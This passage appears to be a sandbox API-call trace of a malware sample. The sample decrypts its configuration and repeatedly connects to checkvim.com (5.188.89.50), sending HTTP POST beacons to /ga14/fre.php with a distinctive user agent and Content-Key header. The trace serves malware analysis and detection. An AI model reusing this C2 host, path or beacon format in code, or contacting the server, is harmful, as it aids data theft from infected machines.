(in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8875c8 | out: hHeap=0x840000) returned 1 [0322.333] GetProcessHeap () returned 0x840000 [0322.333] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87fc20 [0322.333] GetProcessHeap () returned 0x840000 [0322.333] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8875c8 [0322.334] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0322.335] wvsprintfA (in: param_1=0x8875c8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0322.335] GetProcessHeap () returned 0x840000 [0322.335] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0322.335] GetProcessHeap () returned 0x840000 [0322.335] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8875c8 | out: hHeap=0x840000) returned 1 [0322.335] send (s=0x580, buf=0x873a58*, len=237, flags=0) returned 237 [0322.336] send (s=0x580, buf=0x87eb58*, len=159, flags=0) returned 159 [0322.336] GetProcessHeap () returned 0x840000 [0322.336] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0322.336] recv (in: s=0x580, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0322.686] GetProcessHeap () returned 0x840000 [0322.686] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0322.686] GetProcessHeap () returned 0x840000 [0322.686] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fc20 | out: hHeap=0x840000) returned 1 [0322.686] GetProcessHeap () returned 0x840000 [0322.687] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0322.687] GetProcessHeap () returned 0x840000 [0322.687] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f688 | out: hHeap=0x840000) returned 1 [0322.687] closesocket (s=0x580) returned 0 [0322.687] GetProcessHeap () returned 0x840000 [0322.687] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871bc8 | out: hHeap=0x840000) returned 1 [0322.687] GetProcessHeap () returned 0x840000 [0322.687] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0322.687] GetProcessHeap () returned 0x840000 [0322.687] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f758 | out: hHeap=0x840000) returned 1 [0322.687] GetProcessHeap () returned 0x840000 [0322.687] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871600 | out: hHeap=0x840000) returned 1 [0322.687] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0xa3c) returned 0x580 [0322.689] Sleep (dwMilliseconds=0xea60) [0322.704] GetProcessHeap () returned 0x840000 [0322.704] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fd88 [0322.704] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0322.705] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0322.710] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0322.711] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x870128) returned 1 [0322.717] GetProcessHeap () returned 0x840000 [0322.717] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0322.718] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0322.718] CryptImportKey (in: hProv=0x870128, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e7b0) returned 1 [0322.719] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0322.719] CryptSetKeyParam (hKey=0x87e7b0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0322.720] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0322.720] CryptSetKeyParam (hKey=0x87e7b0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0322.720] GetProcessHeap () returned 0x840000 [0322.721] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0322.721] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0322.721] CryptDecrypt (in: hKey=0x87e7b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fd88, pdwDataLen=0x19f9a4 | out: pbData=0x87fd88, pdwDataLen=0x19f9a4) returned 1 [0322.722] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0322.722] CryptDestroyKey (hKey=0x87e7b0) returned 1 [0322.723] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0322.723] CryptReleaseContext (hProv=0x870128, dwFlags=0x0) returned 1 [0322.723] GetProcessHeap () returned 0x840000 [0322.723] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0322.724] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0322.724] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0322.726] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0322.726] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0322.727] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0322.727] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0322.727] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0322.728] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0322.728] GetProcessHeap () returned 0x840000 [0322.728] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871600 [0322.728] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0322.728] GetProcessHeap () returned 0x840000 [0322.728] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871600 | out: hHeap=0x840000) returned 1 [0322.728] GetProcessHeap () returned 0x840000 [0322.728] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0322.728] GetProcessHeap () returned 0x840000 [0322.728] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fd88 | out: hHeap=0x840000) returned 1 [0322.728] GetProcessHeap () returned 0x840000 [0322.728] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f710 [0322.729] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0322.730] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0322.738] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0322.738] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86ff90) returned 1 [0322.743] GetProcessHeap () returned 0x840000 [0322.743] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870818 [0322.744] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0322.744] CryptImportKey (in: hProv=0x86ff90, pbData=0x870818, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e270) returned 1 [0322.745] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0322.745] CryptSetKeyParam (hKey=0x87e270, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0322.746] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0322.746] CryptSetKeyParam (hKey=0x87e270, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0322.746] GetProcessHeap () returned 0x840000 [0322.746] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870818 | out: hHeap=0x840000) returned 1 [0322.746] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0322.747] CryptDecrypt (in: hKey=0x87e270, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f710, pdwDataLen=0x19f9a4 | out: pbData=0x87f710, pdwDataLen=0x19f9a4) returned 1 [0322.747] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0322.748] CryptDestroyKey (hKey=0x87e270) returned 1 [0322.748] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0322.748] CryptReleaseContext (hProv=0x86ff90, dwFlags=0x0) returned 1 [0322.748] GetProcessHeap () returned 0x840000 [0322.748] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0322.749] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0322.749] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0322.750] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0322.750] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0322.751] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0322.751] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0322.751] GetProcessHeap () returned 0x840000 [0322.751] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871420 [0322.751] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871600*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878aa0*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0322.752] GetProcessHeap () returned 0x840000 [0322.752] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871c38 [0322.752] socket (af=2, type=1, protocol=6) returned 0x584 [0322.753] connect (s=0x584, name=0x878aa0*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0322.824] FreeAddrInfoW (pAddrInfo=0x871600*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878aa0*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0322.824] GetProcessHeap () returned 0x840000 [0322.825] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86f710 [0322.825] GetProcessHeap () returned 0x840000 [0322.825] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8875c8 [0322.826] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0322.827] wvsprintfA (in: param_1=0x8875c8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0322.828] GetProcessHeap () returned 0x840000 [0322.828] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0322.828] GetProcessHeap () returned 0x840000 [0322.828] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8875c8 | out: hHeap=0x840000) returned 1 [0322.828] GetProcessHeap () returned 0x840000 [0322.828] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87fa28 [0322.828] GetProcessHeap () returned 0x840000 [0322.828] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8875c8 [0322.829] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0322.830] wvsprintfA (in: param_1=0x8875c8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0322.830] GetProcessHeap () returned 0x840000 [0322.830] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0322.830] GetProcessHeap () returned 0x840000 [0322.830] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8875c8 | out: hHeap=0x840000) returned 1 [0322.830] send (s=0x584, buf=0x873a58*, len=237, flags=0) returned 237 [0322.830] send (s=0x584, buf=0x87eb58*, len=159, flags=0) returned 159 [0322.831] GetProcessHeap () returned 0x840000 [0322.831] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0322.831] recv (in: s=0x584, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0323.392] GetProcessHeap () returned 0x840000 [0323.392] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0323.392] GetProcessHeap () returned 0x840000 [0323.392] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fa28 | out: hHeap=0x840000) returned 1 [0323.392] GetProcessHeap () returned 0x840000 [0323.392] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0323.392] GetProcessHeap () returned 0x840000 [0323.392] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f710 | out: hHeap=0x840000) returned 1 [0323.392] closesocket (s=0x584) returned 0 [0323.392] GetProcessHeap () returned 0x840000 [0323.392] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871c38 | out: hHeap=0x840000) returned 1 [0323.393] GetProcessHeap () returned 0x840000 [0323.393] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0323.393] GetProcessHeap () returned 0x840000 [0323.393] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f710 | out: hHeap=0x840000) returned 1 [0323.393] GetProcessHeap () returned 0x840000 [0323.393] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871420 | out: hHeap=0x840000) returned 1 [0323.393] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0xc50) returned 0x584 [0323.394] Sleep (dwMilliseconds=0xea60) [0323.406] GetProcessHeap () returned 0x840000 [0323.406] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f5f0 [0323.407] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0323.407] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0323.412] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0323.413] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x870128) returned 1 [0323.418] GetProcessHeap () returned 0x840000 [0323.418] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0323.419] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0323.419] CryptImportKey (in: hProv=0x870128, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e330) returned 1 [0323.420] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0323.421] CryptSetKeyParam (hKey=0x87e330, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0323.421] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0323.421] CryptSetKeyParam (hKey=0x87e330, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0323.421] GetProcessHeap () returned 0x840000 [0323.421] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0323.422] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0323.423] CryptDecrypt (in: hKey=0x87e330, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f5f0, pdwDataLen=0x19f9a4 | out: pbData=0x87f5f0, pdwDataLen=0x19f9a4) returned 1 [0323.423] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0323.424] CryptDestroyKey (hKey=0x87e330) returned 1 [0323.424] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0323.424] CryptReleaseContext (hProv=0x870128, dwFlags=0x0) returned 1 [0323.424] GetProcessHeap () returned 0x840000 [0323.424] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0323.425] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0323.425] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0323.426] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0323.426] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0323.426] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0323.427] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0323.427] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0323.427] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0323.428] GetProcessHeap () returned 0x840000 [0323.428] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871240 [0323.428] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0323.428] GetProcessHeap () returned 0x840000 [0323.428] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871240 | out: hHeap=0x840000) returned 1 [0323.428] GetProcessHeap () returned 0x840000 [0323.428] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0323.428] GetProcessHeap () returned 0x840000 [0323.428] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f5f0 | out: hHeap=0x840000) returned 1 [0323.428] GetProcessHeap () returned 0x840000 [0323.428] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f9e0 [0323.428] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0323.429] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0323.432] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0323.433] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f248) returned 1 [0323.437] GetProcessHeap () returned 0x840000 [0323.437] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0323.438] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0323.438] CryptImportKey (in: hProv=0x86f248, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e2f0) returned 1 [0323.439] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0323.439] CryptSetKeyParam (hKey=0x87e2f0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0323.439] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0323.440] CryptSetKeyParam (hKey=0x87e2f0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0323.440] GetProcessHeap () returned 0x840000 [0323.440] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0323.440] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0323.440] CryptDecrypt (in: hKey=0x87e2f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f9e0, pdwDataLen=0x19f9a4 | out: pbData=0x87f9e0, pdwDataLen=0x19f9a4) returned 1 [0323.441] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0323.441] CryptDestroyKey (hKey=0x87e2f0) returned 1 [0323.442] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0323.442] CryptReleaseContext (hProv=0x86f248, dwFlags=0x0) returned 1 [0323.442] GetProcessHeap () returned 0x840000 [0323.442] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0323.442] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0323.443] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0323.443] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0323.444] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0323.444] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0323.444] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0323.444] GetProcessHeap () returned 0x840000 [0323.444] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871420 [0323.444] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871330*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c08*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0323.445] GetProcessHeap () returned 0x840000 [0323.445] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b48 [0323.446] socket (af=2, type=1, protocol=6) returned 0x588 [0323.446] connect (s=0x588, name=0x878c08*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0323.530] FreeAddrInfoW (pAddrInfo=0x871330*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c08*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0323.530] GetProcessHeap () returned 0x840000 [0323.530] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86f688 [0323.530] GetProcessHeap () returned 0x840000 [0323.530] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8875c8 [0323.531] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0323.531] wvsprintfA (in: param_1=0x8875c8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0323.531] GetProcessHeap () returned 0x840000 [0323.531] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0323.531] GetProcessHeap () returned 0x840000 [0323.532] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8875c8 | out: hHeap=0x840000) returned 1 [0323.532] GetProcessHeap () returned 0x840000 [0323.532] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87f7a0 [0323.532] GetProcessHeap () returned 0x840000 [0323.532] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8875c8 [0323.532] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0323.533] wvsprintfA (in: param_1=0x8875c8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0323.533] GetProcessHeap () returned 0x840000 [0323.533] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0323.533] GetProcessHeap () returned 0x840000 [0323.533] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8875c8 | out: hHeap=0x840000) returned 1 [0323.533] send (s=0x588, buf=0x873a58*, len=237, flags=0) returned 237 [0323.533] send (s=0x588, buf=0x87eb58*, len=159, flags=0) returned 159 [0323.534] GetProcessHeap () returned 0x840000 [0323.534] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0323.534] recv (in: s=0x588, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0323.894] GetProcessHeap () returned 0x840000 [0323.894] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0323.895] GetProcessHeap () returned 0x840000 [0323.895] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f7a0 